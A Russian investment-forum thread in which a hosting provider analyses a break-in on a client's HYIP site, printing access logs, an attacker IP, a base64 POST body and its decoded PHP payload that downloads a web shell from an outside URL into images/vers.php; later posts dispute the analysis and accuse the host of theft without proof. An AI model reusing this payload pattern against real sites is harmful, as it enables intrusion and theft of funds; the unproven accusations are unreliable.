• Реклама: 💰 Пополни свой портфель с минимальной комиссией на Transfer24.pro
  • Добро пожаловать на инвестиционный форум!

    Во всем многообразии инвестиций трудно разобраться. MMGP станет вашим надежным помощником и путеводителем в мире инвестиций. Только самые последние тренды, передовые технологии и новые возможности. 400 тысяч пользователей уже выбрали нас. Самые актуальные новости, проверенные стратегии и способы заработка. Сюда люди приходят поделиться своим опытом, найти и обсудить новые перспективы. 16 миллионов сообщений, оставленных нашими пользователями, содержат их бесценный опыт и знания. Присоединяйтесь и вы!

    Впрочем, для начала надо зарегистрироваться!
  • 🐑 Моисей водил бесплатно. А мы платим, хотя тоже планируем работать 40 лет! Принимай участие в партнеской программе MMGP
  • 📝 Знаешь буквы и умеешь их компоновать? Платим. Дорого. Бессрочная акция от MMGP: "ОПЛАТА ЗА СООБЩЕНИЯ"

История одной уязвимости

ddos-guard

Интересующийся
Регистрация
15.02.2013
Сообщения
6
Реакции
30
Поинты
0.000
[22:17:19] ***: кто-то залел и поменял файл. Было это 9 числа
[22:17:30] ***: сторонний человек сделать этого не мог
[22:19:24] ***: как этов возможно что у вас по хостингу кто-то ходит ?

Вечер переставал быть томным. Кристально ясно, что никто нигде «ходить» не может, но на лицо нарушение режима безопасности отдельно взятого домена и возможно аккаунта.
Клиент немедленно передается комманде безопасности, допрос с пристрастием приподнимает завесу тайны:

[22:23:48] ***: Как могут ходить по аккаунту ? Вы что издеваетесь ?
[22:23:58] ***: Файл был изменен не с моей стороны
[22:24:07] ***: добавлена строчка на левый редирект в файле
[22:25:32] ddos-guard: используя уязвимость в коде, или стронний шел, могут ходить и изменять данные в вашем аккаунте
[22:31:06] ***: о чем вы вобще говорите ? Файл редиректа был изменен 09.02.2013 в 13:36 и в него была добавлена левая строчка которая при определенных условиях подменивала кошелек. Это что за фигня такая
[22:37:05] ddos-guard: какой файл был изменен?
[22:37:41] ***: deposit.libertyreserve.confirm.tpl
[23:01:15] ddos-guard: расскажите, вот это что это?
https://***.**/images/vers.php
[23:03:25] ***: кстати да, это тоже что ?

Клиент искренне недоумевает как мог изменится файл, при ограничении доступа к FTP по IP. Ситуация достаточно очевидная и в этих ваших интернетах не редкая — на сайте шел. Некто каким-то образом загрузил шел-бекдор в каталог images и вставил хитроумный редирект в шаблон платежной страницы. Казалось бы, не дело хостинга разбираться в личных отношениях клиента и разработчика скрипта, клиента и его дизайнера, клиента и любых других третьих лиц.
В нашем случае как раз дело хостинга. Причина простая — взлом не менее вредоносен для клиента чем DDoS-атака, а значит защита от атак бессмысленна без 100% гарантий безопасности. Именно поэтому мы не используем сторонние панели, именно поэтому все возможности вторжения надежно исключены и проверены не один раз. К сожалению, гарантию от дыр в скриптах не даст даже Госстрах.

[23:20:32] ddos-guard: итак
[23:20:38] ***: да
[23:20:40] ddos-guard: взломщик орудовал с адреса 46.238.35.171
[23:20:45] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:10:05 +0400] "GET /fonts/vers.php HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
[23:20:58] ddos-guard: в 15:10 он проверил не осталось ли fonts.php
[23:21:02] ddos-guard: 404 - не осталось
[23:21:09] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:14:44 +0400] "GET /index.php HTTP/1.0" 200 4275 "-" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:21:12] ddos-guard: потыкался по сайту
[23:21:22] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:18:06 +0400] "POST /admin.php HTTP/1.0" 200 155 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
46.238.35.171 - - [09/Feb/2013:15:19:35 +0400] "POST /admin.php HTTP/1.0" 200 113733 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:21:33] ddos-guard: сделал два POST-запроса, судя по всему к админке
[23:21:52] ddos-guard: второй запрос имел тело с размеров в точности равным images/vers.php
[23:21:58] ddos-guard: 113733 байт
[23:22:22] ddos-guard: 6.238.35.171 - - [09/Feb/2013:15:20:21 +0400] "GET /images/ HTTP/1.1" 403 372 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
46.238.35.171 - - [09/Feb/2013:15:20:25 +0400] "GET /images/123.php HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
46.238.35.171 - - [09/Feb/2013:15:21:02 +0400] "POST /admin.php HTTP/1.0" 200 150 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:22:45] ddos-guard: зачем-то проверил images/123.php, не нашел его, еще раз запросил admin.php
[23:23:02] ddos-guard: и следующим запросом открыл image/vers.php
[23:23:03] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:21:11 +0400] "GET /images/vers.php HTTP/1.1" 200 5070 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"


На голый, чистый красивый и лицензионный Gold Coders залит шел. POST-запрос к admin.php привел к выполнению произвольного кода в контексте скрипта клиента. На этом можно было бы и закончить, но остается незакрытым вопрос что именно является триггером уязвимости. Сам admin.php конечно же зашифрован (в целях безопасности, не иначе). К счастью все ходы записаны, даже для запросов недельной давности. Смотрим тело POST-запроса к admin.php:

------------------------------5dc66f5a13d8
Content-Disposition: form-data; name=\x22bbbp\x22\x0D\x0A\x0D\x0AZWNobyAiPHByZT4iO2VjaG8gMTExMTE7ZWNobyAiPC9wcmU+IjtleGl0Ow==
------------5dc66f5a13d8--

base64? Очень похоже.
Скрипт увидит примерно следующее:
$name = ‘“bbbp”

echo "<pre>";$a=file_get_contents("http://stern-capital.com/uploads/rtsa");
$fp = fopen ("images/vers.php", "w+");
fwrite ($fp, $a);
fclose ($fp);
echo "</pre>"’;

Ай-ай, admin.php взял да и сделал eval() на данных, полученных из сети.
Дальше всё просто, выполненный eval-ом код скачал шел с сайта взломщика, а чтобы воспользоваться шелом, хакером можно уже и не быть.

Невозможно с уверенностью сказать, почему в admin.php выполняется произвольный код — бекдор от разработчиков, недостаточная проверка входных параметров или какая-то досадная оплошность. Скрипт зашифрован и вполне вероятно, что достоверно о причинах такого поведения мы не узнаем никогда.

Какие выводы можно сделать из этого инцидента:

Для пользователей Gold Coders
Не пользуйтесь этим скриптом! Если вы всё еще хотите попробовать — не пользуйтесь этим скриптом. Из зрительного зала подсказывают - «так ведь других нет», хочется ответить по классику — лучше никакими не пользуйтесь.
Если, не смотря на всё вышеизложенное, вы всё еще очень хотите Gold Coders — закройте в .htaccess доступ к админке, оставив разрешения только для своего статического IP.

Разработчикам Gold Coders
Бекдоры — это не хорошо, ситуация как минимум требует публичного пояснения.
Портируйте уже наконец ваше творение хотя бы на php 5.3 — на улице 2013 год, скрипт исполняемый в среде php 5.2 не может быть безопасен by definition.
 
Последнее редактирование:

kodyaich

ТОП-МАСТЕР
Регистрация
09.07.2011
Сообщения
22,044
Реакции
9,470
Поинты
0.000
:dirol: ответ ГК на просьбу прокомментировать ситуёвину...
Я проверил скрипт, $ имя параметра используется после аутентификации администратора только после многих других условий, и этот параметр включен в таблицу MySQL без Eval () функцию. Сценарий не используйте Eval функции.
Я уверен, что сайт был размещен на их DDoS защитой виртуального хостинга, но vitrual хостингах, чтобы другие пользователи сервера чтение / изменение файлов других клиентов
кто-нить может объяснить понятней, для чайника?:)
 

Mega-Hyip

ТОП-МАСТЕР
Регистрация
15.07.2010
Сообщения
64,878
Реакции
5,996
Поинты
23.710
:dirol: ответ ГК на просьбу прокомментировать ситуёвину...кто-нить может объяснить понятней, для чайника?:)

типа у всех есть доступ на чтение/изменения, как я понимаю это можно отключить по фтп, тогда и вам не будет доступа к этому файлу:wink2:
а легче спрятать этот файл admin.php тогда хакер и запрос на него не сделает не зная где он:wink2:
 

kodyaich

ТОП-МАСТЕР
Регистрация
09.07.2011
Сообщения
22,044
Реакции
9,470
Поинты
0.000

Mega-Hyip

ТОП-МАСТЕР
Регистрация
15.07.2010
Сообщения
64,878
Реакции
5,996
Поинты
23.710
:dirol: ГК ж вроде рекомендуют при установке скрипта изменить доступ к папкам на "только для чтения"...

ну сами знаете кто-то прислушался а кто-то нет, пока питух не загнет в одно место:biggrin2:
а я вообще как говорил в одной из тем рекомендую скрывать файл admin.php и не будет проблем:wink2:
 

allegroman

ТОП-МАСТЕР
Регистрация
04.01.2011
Сообщения
22,360
Реакции
9,469
Поинты
0.040
кто-нить может объяснить понятней, для чайника?
сам ГК, только на русском... :) как я понял, говорят шо юзеру надо было брать дедик,
а на хостинге есть возможность получить доступ к файлам другого юзера, и отредактировать их "как надо"... :)
ты бы исходник выложил, на английском... :wink2:
 
Последнее редактирование:

kodyaich

ТОП-МАСТЕР
Регистрация
09.07.2011
Сообщения
22,044
Реакции
9,470
Поинты
0.000
ты бы исходник выложил, на английском...
I checked script, $name parameter is used AFTER admin autentification only, after many of other conditions, and this param inserted in mysql table without any eval() function. Script do not use eval function.
I'm sure that website was hosted on their ddos protected virtual hosting, but vitrual hostings allow other users of server read/change files of other clients.
 

WorldOfHYIP

Новичок
Регистрация
21.09.2012
Сообщения
1,960
Реакции
845
Поинты
0.000
а легче спрятать этот файл admin.php тогда хакер и запрос на него не сделает не зная где он

Найдет методом перебора директорий. Вопрос времени.

добавлено через 6 минут
:dirol: ответ ГК на просьбу прокомментировать ситуёвину...кто-нить может объяснить понятней, для чайника?:)

Все просто, если верить этому ответу, то скрипт GC не использует eval() функцию в своем коде и это сводит на нет вышеупомянутое расследование.

А причина действительно могла быть в том, что на этом же сервере у другого пользователя был скомпрометирован аккаунт и с этого взлом и начался, ведь неизвестно, сколько было пострадавших в результате данного инцидента. Я могу подтвердить что такое возможно, был случай очень давно на хостинге BlackLotus’а.
 
Последнее редактирование:

Mega-Hyip

ТОП-МАСТЕР
Регистрация
15.07.2010
Сообщения
64,878
Реакции
5,996
Поинты
23.710
Найдет методом перебора директорий. Вопрос времени.

узнавал давно что если имя сделать из 20 символов то придется очень дооооолго искать а если поставить вообще 80-90 то пусть ищет до старости:wink2:
 

WorldOfHYIP

Новичок
Регистрация
21.09.2012
Сообщения
1,960
Реакции
845
Поинты
0.000
узнавал давно что если имя сделать из 20 символов то придется очень дооооолго искать а если поставить вообще 80-90 то пусть ищет до старости:wink2:

Возможно, только в большинстве случаев скрипт зашифрован и нет возможности что-то менять. Да, и вы недооцениваете возможности облачных технологий. Раньше некоторые хэши паролей считали, что будут ломать до старости.
 

Funy-Maker

ТОП-МАСТЕР
Регистрация
27.01.2013
Сообщения
6,393
Реакции
9,566
Поинты
0.530

Wolfcron

Новичок
Регистрация
27.02.2013
Сообщения
1,054
Реакции
1,865
Поинты
0.000
Случилась такая интересная ситуация...Я активно наблюдал за взломом последних проектов, являющихся клиентами DDoS Guard. Пару дней назад несколько знакомых стали утверждать, что взлом происходит со стороны именно DDoS Guard. Я очень сомневался в этом, так как известны частые случаи подобных взломов на других хостингах. Но вот в чем проблема, на других хостингах (на всех без исключения), атаки производятся методом DoS или SQL. Но только у хостинг-провайдера DDoS Guard каким то странным и необычным способом происходит подключение к FTP серверу. Тут я поднял пару своих старых учебников и стал искать, как можно взломать FTP. В итоге получил на всё один ответ - никак, кроме прямого взлома сервера или подборкой паролей (Bruteforce). Как нам ясно, ни тот ни этот метод не подходят нам в данном случае. Просто ради интереса и пояснения сложившейся ситуации я решил переговорить со "специалистом" DDoS Guard. Итак :

[17:49:51] Wolfcron: Добрый день. В последние дни произошло порядка 10 взломов на вашем хостинге. Пошли слухи от десятков админов HYIP проектов, что взлом был осуществлен путем вшивания шелл файлов. С шеллами понятно - уязвимость *htacess. Вот интересует другое, как могли взломать пароль к фтп? Шелл не способен ведь вытащить пароль к фтп. Интересует информация, так как в настоящее время имя вашей компании под ударом и рассылается новость, что именно вы и воруете деньги.
[17:50:30] ddos-guard: рассылается кем и куда?
[17:50:55] Wolfcron: Это конфиденциальная информация.
[17:51:06] ddos-guard: Мы даже не храним данные для доступа.
[17:52:18] Wolfcron: В таком случае интересно, как ломается и получают доступ к фтп. Доступ к фтп взломать реально только при прямом взломе сервера
[17:53:45] Wolfcron: Думаю легко понятно, что пароль типа 12345 можно взломать минут за 15, а пароль GhTWUu&@*93 лет 50 потребуется. Насколь мне известно, вы используете пароли со спецсимволами.
[17:54:45] ddos-guard: мы используем длинные пароли с хорошей стойкостью от перебора, мы отслеживаем доступы к FTP и биллингу
[17:55:13] Wolfcron: В таком случае как на вашем "высокозащищенном" сервере происходит взлом паролей?
[17:56:01] ddos-guard: пока есть основания предполагать, что пароли вытаскиваются с почты клиента или напрямую с его компьютера
[17:56:33 | Изменены 17:56:40] Wolfcron: То есть вы хотите сказать что порядка 5 админов взломали через их компьютер?
[17:56:39] ddos-guard: ddos-guard отправил контактные данные Wolfcron.
[17:57:07] ddos-guard: или через почту
[17:57:37] Wolfcron: А вам не кажется странным, что несколько админов взломали через "почту" ?
[17:58:11] Wolfcron: Больше это похоже на гон и есть серьезные основания полагать что ddos guard причастны ко взломам и уводу денег средств
[17:58:43 | Изменены 17:58:49] Wolfcron: Везде одно и то же : Instant - шелл - взлом фтп - DDoS Guard
[17:59:41] ddos-guard: о каких основаниях вы говорите?
[18:01:18] Wolfcron: Об обычных. рассмотрим слудующую ситуацию. К примеру возьмем проект N. Хостился на Block DoS. был произведен взлом - НО - ДОСТУПА К ФТП НЕ БЫЛО У ХАКЕРОВ. Потом данный проект перекинули на ваш хостинг, сменили пароли, обновили защиту - И чудным образом произошел взлом - на этот раз уже через прямой доступ к фтп.
[18:01:27] Wolfcron: Буквально в течении 2-3 часов после переноса
[18:01:55] ddos-guard: т.е. проект ломают везде, а вы говорите что виноват хостинг, я правильно понимаю?
[18:02:05] ddos-guard: так о каких основаниях вы говорили?
[18:02:14] ddos-guard: пока я вижу домыслы
[18:02:34] Wolfcron: Проекты ломают НЕ ВЕЗДЕ. Суть в следующем : Только у вас на хостинге получают прямой доступ к фтп.
[18:02:48 | Изменены 18:03:21] Wolfcron: В других проектах взломов на 90% меньше на других хостингах
[18:02:56] Wolfcron: И тип атак DoS или SQL
[18:03:58] ddos-guard: очевидно у нас эти атаки не работают, приходится изобретать более сложные пути
[18:05:21] Wolfcron: Как показало наблюдение - взлом фтп не такой уж и более сложный путь, если взлом произошел у знакомого через 3 часа после переноса БД и файлов на ваш сервер.
[18:07:17] Wolfcron: В таком случае раз вы предполагает что возможен взлом через почту, объясните следующий момент :
Почта связана с телефоном, чтобы войти в неё необходимо получить пароль в смс сообщении, неужто телефон и смс тоже взломали?
[18:07:56] ddos-guard: доступ к ftp элементарно блокируется в .ftpaccess
[18:08:10] Wolfcron: Понимаю. Как взломали тогда?
[18:11:23] ddos-guard: если вы предполагаете утечку пароля, доступ всегда можно закрыть по IP в .ftpaccess
[18:29:53] Wolfcron: https://mmgp.com/showpost.php?p=4035264&postcount=1
[18:30:00] Wolfcron: Клиент искренне недоумевает как мог изменится файл, при ограничении доступа к FTP по IP.
[18:30:12] Wolfcron: Вы писали что ограничение и доступ были закрыты по IP
[18:30:53] Wolfcron: Для пользователей Gold Coders
Не пользуйтесь этим скриптом!

Взлом идет не только на GC, но и в других скриптах, даже самописных
[18:45:36] Wolfcron: Как это прокомментируете?
[18:49:42] ddos-guard: скажите, что вы от меня хотите услышать?
[18:49:57] ddos-guard: мы не ломаем пользователей и не имеем в этом интереса
[18:51:00] Wolfcron: В таком случае вы подтверждаете факт, что ваш хостинг не способен дать необходимую защиту вашим клиентам
[18:51:15] ddos-guard: ни в коем случае
[18:51:44] Wolfcron: Как объясните факт тогда, что именно у вас сыпятся проекты и угоняются средства?
[19:08:13] Wolfcron: Грубо говоря оперирую фактом. Из-за некомпитентности ваших сотрудников, а также невозможности предоставить необходимую защиту своим клиентам НА ДАННОМ этапе, практически ЕЖЕДНЕВНО теряют астрономические суммы не только админы проектов, но в том числе и тысячи (а может и больше) простых пользователей, по причине взлома проектов. В таком случае о какой защите может идти речь, если вы даже не можете обезопасить сохранность средств ваших клиентов.
[19:13:37] ddos-guard: "некомпитентности" - это какими фактами вы оперируете?
[19:13:44] ddos-guard: словарем русского языка?
[19:14:58] Wolfcron: Отнюдь. Выше я написал - невозможности предоставить защиту. То есть, вы отлично знаете о взломах на вашем хостинге, но ничего не делаете. Тем временем взломы продолжаются, а люди (в том числе и я) теряют свои средства.
[19:15:12] Wolfcron: Или вы хотите сказать, что надо вас поблагодарить?
[19:15:23] ddos-guard: скажите, вы наш клиент?
[19:15:32 | Изменены 19:15:49] Wolfcron: Слава Богу, что нет
[19:17:13] ddos-guard: и не планируете им стать?
[19:17:50] Wolfcron: И не планирую им стать, пока Вы не наладите работу не сделаете все возможное для защиты ваших же клиентов.
[19:18:12] ddos-guard: отлично. Тогда не тратьте моё время пустыми домыслами
[19:18:52] Wolfcron: С чего вы взяли что это пустые домыслы? Вы не ответили ни на 1 вопрос и не дали ни 1 должного разъяснения сложившейся ситуации.

Итак получаем следующее : Ни на 1 интересующий меня вопрос так и не получено ни одного адекватного или более-менее разъясняющего момент/ситуацию ответа.
На каждый вопрос - отговорки. На каждый второй вопрос - молчание. Какой вывод?

Вывод следующий : Пока DDoS Guard не разъяснит ситуацию или хотя бы не попытается какими-либо методами обезопасить своих клиентов - ВЕРИТЬ ИМ НЕЛЬЗЯ!
 
Последнее редактирование:

General-I

Интересующийся
Регистрация
19.03.2013
Сообщения
2
Реакции
13
Поинты
0.000

MoscowMany

МАСТЕР
Регистрация
29.07.2012
Сообщения
2,265
Реакции
5,755
Поинты
0.010

Денис Ричмонд

ТОП-МАСТЕР
Регистрация
21.06.2012
Сообщения
6,035
Реакции
12,018
Поинты
0.000

Nata Kras

ТОП-МАСТЕР
Регистрация
03.06.2012
Сообщения
11,312
Реакции
18,470
Поинты
0.000
General-I, я так понимаю вы админ генерала? Выложите переписку с гуардом.
не, ну что за модераторы, забанили уже генерала
Дата блокировки: 19.03.2013 / Заблокирован до: 29.03.2013
Причина: набивка постов
Кто заблокировал: LSasha
 

MoscowMany

МАСТЕР
Регистрация
29.07.2012
Сообщения
2,265
Реакции
5,755
Поинты
0.010
сегодня будет не сколько логов от разных проектов и админов.
где взлом происходил через ftp и у каждого админа были разные скрипты.
А пароли только у doss guard которые пытаются навязать инвесторам и админам, что они не причем.
Вчера вкинул в проект 500 баксов, а сегодня мне сообщили что doss guard пытается их хакнуть и забрать деньги инвесторов из этого проекта.
Благо все обошлось...Почему я должен терять вложенные деньги? С инвесторами простыми они в скайпе не общаяются
 
Последнее редактирование:

Wolfcron

Новичок
Регистрация
27.02.2013
Сообщения
1,054
Реакции
1,865
Поинты
0.000
Общение с клиентами замечательное)))
Я не клиент если даже, я потерял по ихней вине часть своих средств как и другие пользователи. Мне что теперь, сидеть молчать? Факт остается фактом - пока не пояснят ситуацию публично - пока что нет доверия словам специалистов.
 

Gilan

ТОП-МАСТЕР
Регистрация
15.09.2010
Сообщения
5,766
Реакции
3,696
Поинты
0.000
Сверху Снизу